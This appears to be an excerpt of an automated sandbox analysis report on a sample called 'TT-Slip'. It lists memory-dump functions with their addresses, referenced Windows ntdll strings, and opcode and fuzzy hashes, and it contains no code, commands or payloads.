String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
API String ID: 0-2986994758
Opcode ID: e806ce78dd70d00c76247f6f8dae81d34c2c8389a07ebb3834b111bda0b239b0
Instruction ID: cd6812291f533d13909855071b8a850e3b331b974d420989a6736a06112cc490
Opcode Fuzzy Hash: e806ce78dd70d00c76247f6f8dae81d34c2c8389a07ebb3834b111bda0b239b0
Instruction Fuzzy Hash: 26F04C74780308BFE720E60DDC57F99BB68FB41B24F20005DF60077289D5B0E940C641

Function 016A03E9 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 184COMMON

Download Yara Rule

APIs

___swprintf_l.LIBCMT ref: 016F4D8A

Strings

#%u, xrefs: 016F4D82

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID: ___swprintf_l
String ID: #%u
API String ID: 48624451-232158463
Opcode ID: 9407ebfaab16d493e91f226420a677dd8aaa33b262c1649f8ea64ca5b409bc6f
Instruction ID: e8705d2c0352b8ae47edb28f9ccb1e0b4659c98297a5b0fe0d680097528df435
Opcode Fuzzy Hash: 9407ebfaab16d493e91f226420a677dd8aaa33b262c1649f8ea64ca5b409bc6f
Instruction Fuzzy Hash: 2A712772A0114A9FDB01DFA8CD94BAEB7F9FF08704F144069EA05A7251EB34AD41CBA4

Function 016A52A0 Relevance: 3.2, Strings: 2, Instructions: 658COMMON

Download Yara Rule

Strings

@, xrefs: 016A5445
@, xrefs: 016A55A3

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID: @$@
API String ID: 0-149943524
Opcode ID: 48810337c495e2f27283be025c81af258c8caab7414faaf3d2b14be29d5f11d2
Instruction ID: 47e84923246676a75c7afb3cda131d46744ff45da32204452b323186f4d97941
Opcode Fuzzy Hash: 48810337c495e2f27283be025c81af258c8caab7414faaf3d2b14be29d5f11d2
Instruction Fuzzy Hash: B63269715083618BD724CF19C880B3EBBE1EF85754F94491EEA969B2A0E734DC85CB92

Function 0175A352 Relevance: 2.8, Strings: 2, Instructions: 348COMMON

Download Yara Rule

Strings

`, xrefs: 0175A551
`, xrefs: 0175A44B

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID: `$`
API String ID: 0-197956300
Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction ID: d5c6a89dbab99935756f3c8ee699fa59f769881a405d87ff1edc16f4cd0950b3
Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
Instruction Fuzzy Hash: EFC1CF312043429BEB65CE28C844B6BFBE5EFC4318F184A3DFA968B291D7B5D505CB91

Function 0169A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON

Download Yara Rule

Strings

RtlpResUltimateFallbackInfo Exit, xrefs: 0169A309
RtlpResUltimateFallbackInfo Enter, xrefs: 0169A2FB

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
API String ID: 0-2876891731
Opcode ID: 1351b76254acddbb6fe45355e4a2ba4f185c572bd226f3d8063bc778faf1d706
Instruction ID: e215eda1c13f9ac9ff06619fcd7edce7140ed81f6b1b1f8d4ddbde46112b7379
Opcode Fuzzy Hash: 1351b76254acddbb6fe45355e4a2ba4f185c572bd226f3d8063bc778faf1d706
Instruction Fuzzy Hash: F9418B31A04649DBDF118F99CC50B6ABBF9BF84718F1440A9EA00DB395E3B5D901CB90

Function 017235BA Relevance: 2.6, Strings: 2, Instructions: 99COMMON

Download Yara Rule

Strings

LdrResGetRCConfig Enter, xrefs: 017235EC
LdrResGetRCConfig Exit, xrefs: 017235FE

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID: LdrResGetRCConfig Enter$LdrResGetRCConfig Exit
API String ID: 0-118005554
Opcode ID: 798fbf4f2a985841127a2013488df8689e56a810d63beca9e073d2bda4d502b0
Instruction ID: 77f5225357d030f4ece3ecb9cec81cbfe03928c137b538d4b5fea25467d65644
Opcode Fuzzy Hash: 798fbf4f2a985841127a2013488df8689e56a810d63beca9e073d2bda4d502b0
Instruction Fuzzy Hash: 8D31C3312087529BE321DF68D848B1AF7E8FF89714F0408A9F954CB390E774D906CB96

Function 016C329E Relevance: 2.6, Strings: 2, Instructions: 93COMMON

Download Yara Rule

Strings

@, xrefs: 016C330D
.Local\, xrefs: 016C32B5

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID: .Local\$@
API String ID: 0-380025441
Opcode ID: 371566fad8a3432e4e27561031edb3a6d973dd9e8367d0de6be2a5659ab0043b
Instruction ID: 4f46a1e5952a897a32bd7473e39a5333330602ba191c266c7bd3204862f404e5
Opcode Fuzzy Hash: 371566fad8a3432e4e27561031edb3a6d973dd9e8367d0de6be2a5659ab0043b
Instruction Fuzzy Hash: 5431BCB2508345AFC321DF28CC84A6BBBE8FB85A54F40492EF99987350DB30DD05CB92

Function 016CA5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON

Download Yara Rule

Strings

Threadpool!, xrefs: 016CA5E9
Cleanup Group, xrefs: 016CA5E4

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID: InitializeThunk
String ID: Cleanup Group$Threadpool!
API String ID: 2994545307-4008356553
Opcode ID: 20278d2707c769e7c72498d3db29ed38a287f1b50f885d744d447fb7d07665c0
Instruction ID: 6f57c84641e6255b632f652371f3b3ef508ab1b84894c7864be05602f91e0041
Opcode Fuzzy Hash: 20278d2707c769e7c72498d3db29ed38a287f1b50f885d744d447fb7d07665c0
Instruction Fuzzy Hash: AC01DCB2250788AFD321DF64CD46B2677E8EB84B29F00893DB649C7190E334E804CB4A

Function 01697370 Relevance: 1.7, APIs: 1, Instructions: 247COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e426abe75d5e959e8ed630a13b0ca8383125759b15cf0e64fa51de494e356934
Instruction ID: a70b85fe9a1a5da51953b72dcb4d71d162eb821877bc4ed04eafeaa48b7f7941
Opcode Fuzzy Hash: e426abe75d5e959e8ed630a13b0ca8383125759b15cf0e64fa51de494e356934
Instruction Fuzzy Hash: 9FA17B71618342CFC721DF28C980A2ABBFABF98744F11496EE58587351EB30E945CF96

Function 0174B256 Relevance: 1.4, Strings: 1, Instructions: 130COMMON

Download Yara Rule

Strings

PreferredUILanguages, xrefs: 0174B28F

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID: PreferredUILanguages
API String ID: 0-1884656846
Opcode ID: 64aecd644bb75836be8797a50140da60a961c176be7b376e79c3c1b26b73888c
Instruction ID: 941e5b8d48c5a059c8275ae84b0b0b2eca4e3a91d33cc12c568070fff3bbe2cb
Opcode Fuzzy Hash: 64aecd644bb75836be8797a50140da60a961c176be7b376e79c3c1b26b73888c
Instruction Fuzzy Hash: 7B419472D00219ABDB11DAAACC40BEEF7B9EF45750F05416AEE12A7250D774DE40C7A4

Function 0173705E Relevance: 1.4, Strings: 1, Instructions: 112COMMON

Download Yara Rule

Strings

kLsE, xrefs: 017370A4

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID: kLsE
API String ID: 0-3058123920
Opcode ID: d501b00eeccee7fe1c35b9aecdfa5c2fbe980012b9069e2d47fadcd1cb3a0c93
Instruction ID: 1c491e9d03ee5f21e9e957647d94671b0e81ebd2b4cd95255a074b81577d9b1e
Opcode Fuzzy Hash: d501b00eeccee7fe1c35b9aecdfa5c2fbe980012b9069e2d47fadcd1cb3a0c93
Instruction Fuzzy Hash: 37415AB258135257E735AB68D888B6DBF95A780B38F34821CFD908E0CAC7B044C5C7A1

Function 016C7505 Relevance: 1.4, Strings: 1, Instructions: 111COMMON

Download Yara Rule

Strings

#, xrefs: 01704622

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID: #
API String ID: 0-1885708031
Opcode ID: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
Instruction ID: fc078dc0a7865c1a9c5fd6be1059615074676b53ef562df997654958a0397541
Opcode Fuzzy Hash: 4bc324cfbfa2083798c26090082f3552f5e90ae9522e24348f396a2005f93b47
Instruction Fuzzy Hash: A1418D75A00656EBDF22DF48CC90BBEB7B5FB64B11F40405EE942A7240DB30E942CBA1

Function 01695096 Relevance: 1.3, Strings: 1, Instructions: 71COMMON

Download Yara Rule

Strings

Actx , xrefs: 016950BF

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID: Actx
API String ID: 0-89312691
Opcode ID: 367214fdfa9837577da4cba3a115af42866882c1c5657c18e50ec02c0382df56
Instruction ID: cb5adc1ef22f08039eb58984c7d0d6a9f5746c06e45f338f09ee19f35f6b9123
Opcode Fuzzy Hash: 367214fdfa9837577da4cba3a115af42866882c1c5657c18e50ec02c0382df56
Instruction Fuzzy Hash: 3F1182707096028BEF274D1D8C50636B79EEB96264F34852BE563CB391D771DC42C781

Function 0171106E Relevance: 1.3, Strings: 1, Instructions: 62COMMON

Download Yara Rule

Strings

LdrCreateEnclave, xrefs: 017110F7

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID: LdrCreateEnclave
API String ID: 0-3262589265
Opcode ID: 4b0b5e3fe036002b0672336639b55f35e41e28507f03de2fb486e2918ff6ccbc
Instruction ID: b26e137f4281657ba9e03211b21c55b66608f7b2968a2d9bdeb2cb15572ec67e
Opcode Fuzzy Hash: 4b0b5e3fe036002b0672336639b55f35e41e28507f03de2fb486e2918ff6ccbc
Instruction Fuzzy Hash: B82118B15583449FC320DF2AC845A5BFBE8FBD5B10F504A1EFA909B254D7B0D404CB96

Function 016E739A Relevance: .7, Instructions: 705COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5e8c949e4c4436fc44e5ed8f9ebad757bf7bde0aad5bb558138ebd6b7f99eff4
Instruction ID: 2aece3cbabe33176bc51cbe77f8d5b0d3f2026a6ed6f280122083e6a63d6376e
Opcode Fuzzy Hash: 5e8c949e4c4436fc44e5ed8f9ebad757bf7bde0aad5bb558138ebd6b7f99eff4
Instruction Fuzzy Hash: 0D429D71A016169FDB19CF59C8846AEBBF2FF88314B14866DD952AB340DB30E942CBD0

Function 016BB2C0 Relevance: .6, Instructions: 629COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 63f14587a416085b0a6a8c9b317e44a4c918b700d0c58b097bf22b456a9c68a0
Instruction ID: 904ceaf19b6afcd5bae55ed0b9daf9e3a656f9fce31e527d525fbc4539894463
Opcode Fuzzy Hash: 63f14587a416085b0a6a8c9b317e44a4c918b700d0c58b097bf22b456a9c68a0
Instruction Fuzzy Hash: 32329A72E012199BDB24CFA8DC94BEEBBB6FF54714F18002DE905AB391E7359941CB90

Function 01728158 Relevance: .6, Instructions: 617COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b15b1b705d924ecddc28320a7b0fdb31630204ff2b486ab7906a9f6cd7c72daa
Instruction ID: eb7ea401c292e5d96abec1ecd89a44649dcca506fe11d6ed7a5c21868e25cef0
Opcode Fuzzy Hash: b15b1b705d924ecddc28320a7b0fdb31630204ff2b486ab7906a9f6cd7c72daa
Instruction Fuzzy Hash: D9425C75E102298FEB24CF69CC81BADFBF6BF48300F148199E949AB242D7359985CF51

Function 0173A118 Relevance: .6, Instructions: 591COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b0c3f36e4fdf9a384d756abd55b0a3d40f698102ff53c4a86216723402194b00
Instruction ID: 05cc3639b88b8c6013c042b7811a76be687ceff7fcfc439562031383907c3bd0
Opcode Fuzzy Hash: b0c3f36e4fdf9a384d756abd55b0a3d40f698102ff53c4a86216723402194b00
Instruction Fuzzy Hash: 8F22A9702046618AEB25CF2DC096772FBF1AFC5300F18849AE9D6CB287E735E452DB61

Function 016965D0 Relevance: .4, Instructions: 383COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9a8e11d41b8eb0deee4357c447960e2e7193bb0b7e0c2fbe9d68cc00d3dceae7
Instruction ID: 938e003fd4d50e21acef1162a2e3f764fd41e1b8c9aca44245e9b3813f5af6c7
Opcode Fuzzy Hash: 9a8e11d41b8eb0deee4357c447960e2e7193bb0b7e0c2fbe9d68cc00d3dceae7
Instruction Fuzzy Hash: 7FE1B271508342CFCB15CF28C890A6ABBE5FF89318F05896DF9998B351DB31E905CB92

Function 01688397 Relevance: .4, Instructions: 380COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d725291432ffecdc11bce2c8d8b2e9d63fcb690b436649aa1b76a331e48f3b15
Instruction ID: a977f82538e94beac437046ad7ca2afede44b5861f6f84238365efa965831959
Opcode Fuzzy Hash: d725291432ffecdc11bce2c8d8b2e9d63fcb690b436649aa1b76a331e48f3b15
Instruction Fuzzy Hash: 69D1F272A012169BDB14EF68CC90ABEB7FABF54304F45472DE916DB280E734E951CB60

Function 01718243 Relevance: .3, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
Instruction ID: 42bbf4d7972eb4ad8a33087d2cb690492322df1e4354e677e7f2afcda986a125
Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
Instruction Fuzzy Hash: 6AB19075A00605AFDB25DF9CC940FABFBBAFF84304F14456DAA02A7798DA34E905CB11

Function 016AF460 Relevance: .3, Instructions: 321COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfe865bf6986f3664d13bca0feb2a96af4e758b562ff91ab11e00721f04b6720
Instruction ID: 1b112cc0a9761e32012500a0307794b43aebde8377ceb4ecb9e1bca872c9f742
Opcode Fuzzy Hash: dfe865bf6986f3664d13bca0feb2a96af4e758b562ff91ab11e00721f04b6720
Instruction Fuzzy Hash: C7C10271A012218BDB25CF2CC894BBDBBE1FF54714F998199E9429B3A6E7308D41CF91

Function 016A0535 Relevance: .3, Instructions: 300COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
Instruction ID: d51a2497c24c70de87323d9abca5387e782b1847319a997363337a12526d142c
Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
Instruction Fuzzy Hash: 89B1F271600646AFDB25DBACCD50BBEBBF6AF84304F540199E6969B381DB30ED41CB90

Function 016B90DB Relevance: .3, Instructions: 287COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e6b0d25ba9de0fd76d5aa50268e54b8ce4c22499310fbbd4f69bdca598993316
Instruction ID: e342530ab55f40a054d1bc942aad66a76d536500e24b6e5f39af959b6c348f08
Opcode Fuzzy Hash: e6b0d25ba9de0fd76d5aa50268e54b8ce4c22499310fbbd4f69bdca598993316
Instruction Fuzzy Hash: 12A16071900216AFEB12DFA8CC85FAE7BB9AF45754F014058FB00AB2A0D775EC51CBA4

Function 016983C0 Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e61c8af72a047ba8d3e71155015419dd0e7aa6dd4366815577482ef3e2ea0463
Instruction ID: 258daa9a0b23cb47f4b260270787f2a24f428995705b3330f2da73f15dd4d626
Opcode Fuzzy Hash: e61c8af72a047ba8d3e71155015419dd0e7aa6dd4366815577482ef3e2ea0463
Instruction Fuzzy Hash: 07C15770208345CFDB64CF19C884BAAB7E9BF89744F44492DEA8987391D774E909CF92

Function 0168C427 Relevance: .3, Instructions: 280COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8321425cfbba4a9938df06b4b05e1ca4a6e6f9071e438c794eb79073bb4e07dc
Instruction ID: 3bb322f386d0d57cd442eec033e2f1e6207e2417553511fe52c10b1857c9646e
Opcode Fuzzy Hash: 8321425cfbba4a9938df06b4b05e1ca4a6e6f9071e438c794eb79073bb4e07dc
Instruction Fuzzy Hash: 6AB14F70A002658BDB64DF68CC90BE9B7F6EF44704F0486E9D54AA7381EB709D86CB35

Function 016BE5E7 Relevance: .3, Instructions: 278COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 852f801814ff52486ebb4cbb0565a4bcaa8ebf803c95625fa8ead38659e14f77
Instruction ID: 0ddd1fe1f2f1de4b93b2016c10e7ea1f097c4b28a973359ae757b562d6e6c2f5
Opcode Fuzzy Hash: 852f801814ff52486ebb4cbb0565a4bcaa8ebf803c95625fa8ead38659e14f77
Instruction Fuzzy Hash: DAA10832E006299FEB21DB58CC84FEEBBA5BB01714F1501A9EB11AB391D7749D81CBD1

Function 016D0185 Relevance: .3, Instructions: 276COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e741ab4ec451d74afd58e15402d3ff084f036d4aa473d58f16392bfcc8e4debf
Instruction ID: 4b72a8398e5835f5635abc3997464b172a4b3ce6056465792a0cc2918979461d
Opcode Fuzzy Hash: e741ab4ec451d74afd58e15402d3ff084f036d4aa473d58f16392bfcc8e4debf
Instruction Fuzzy Hash: 31A1AE71F01716DBDB25CF69CD90BAAB7E5FF54318F104029EA4997282EB74E812CB90

Function 01764500 Relevance: .3, Instructions: 275COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 78df7135bdef1f7dc23e496ec256e988501367b5070dd73c120830a0a123d987
Instruction ID: 7d6be9d56f9fe0ad120eb33793ca204f4e4ea67e6767d510416be4a9811e5ed1
Opcode Fuzzy Hash: 78df7135bdef1f7dc23e496ec256e988501367b5070dd73c120830a0a123d987
Instruction Fuzzy Hash: 51A1CB72A44252AFC722DF18CD80B6ABBEAFF48704F55452CF98A9B651D334ED00CB95

Function 017160E0 Relevance: .3, Instructions: 264COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16253a5779efc1b25de792e76499ae478b62540cf3e2e989bc151e7fdd0cbdb8
Instruction ID: ae01c403709fba617cc94792d7b4e5cf46386ed081c60abd6dc3740c6d7b0dde
Opcode Fuzzy Hash: 16253a5779efc1b25de792e76499ae478b62540cf3e2e989bc151e7fdd0cbdb8
Instruction Fuzzy Hash: 9791B171D00216AFDB15CFACD884BBEFBBAAB48710F154169F610EB345D7B4E9009BA4

Function 016AE3F0 Relevance: .3, Instructions: 261COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e206ae1ba4acb885c2bafdc2380c26be4a429f0eda0738cbd0af93271de2645
Instruction ID: 2ed198d330200b44d87aa08271562acc1369622006f177d879250f8a4a5ed842
Opcode Fuzzy Hash: 9e206ae1ba4acb885c2bafdc2380c26be4a429f0eda0738cbd0af93271de2645
Instruction Fuzzy Hash: E4912431A006129BEB249B58DC40B7DBBA2EF94718F45806DFE459B380E736DD41CF61

Function 01691131 Relevance: .3, Instructions: 259COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e86ca781ecae615f68f31b357e66094b7ddb420afdd26e1b51eefefe2158f7c7
Instruction ID: 3459b871e584301e60a19d3217675356b37bbd246f6385c9e3979aa35429b842
Opcode Fuzzy Hash: e86ca781ecae615f68f31b357e66094b7ddb420afdd26e1b51eefefe2158f7c7
Instruction Fuzzy Hash: 6FB113B15093418FD754CF28C880A5AFBF1BB89314F188AAEF999C7352D331E945CB42

Function 0174B52F Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 14aa7f2389c0c2f4a5e39dfbb016f189343e77270b8e137ddafeb974bf5cdc5c
Instruction ID: becf21e77c23cc595fe00b168d8bb236d07822c57d21f4688ba14916b0eb659d
Opcode Fuzzy Hash: 14aa7f2389c0c2f4a5e39dfbb016f189343e77270b8e137ddafeb974bf5cdc5c
Instruction Fuzzy Hash: F6718235A0021A9BDF21CF68C8C0ABEFBFAAF54750F59455BE901AB241E734DD51CB90

Function 016BD090 Relevance: .2, Instructions: 217COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
Instruction ID: d7d5700d6dfd9913bed6fed87cc8514059cc98f1b53b24d49c0807e84bbd8104
Opcode Fuzzy Hash: 2f57846fa6853ce2eba42e0856427c3c37140fe7ac7bc1e87bfd5d4bd44f03bd
Instruction Fuzzy Hash: 5A818C72E011168BDF14CF9CCC80BEDBFB2EB84359F1A816EDA15AB354D73299418B91

Function 016CE284 Relevance: .2, Instructions: 212COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 200821b60e83dfc9197f5c425ed03c549adb8ea5230a744cc6ae4b30951d7aef
Instruction ID: 2daae60172bb3cc25ae33fa1f4cfcdc935cca6df7a045c4257c4856da5527f1a
Opcode Fuzzy Hash: 200821b60e83dfc9197f5c425ed03c549adb8ea5230a744cc6ae4b30951d7aef
Instruction Fuzzy Hash: 13815D71A00609EFDB26CBA9C880BEEBBFAFF48714F10442DE559A7250D731AD45CB60

Function 0171035C Relevance: .2, Instructions: 198COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000009.00000002.2376035163.0000000001660000.00000040.00001000.00020000.00000000.sdmp, Offset: 01660000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_1660000_TT-Slip.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
Instruction ID: 8d741efb6066e382b8bcf5f6547c292f8e0f904408f53029d02bf0e7c808383d
Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
Instruction Fuzzy Hash: EE714C71A0061AEFDB10DFA9C984E9EFBB9FF48700F104569E505AB254EB34EE41CB94

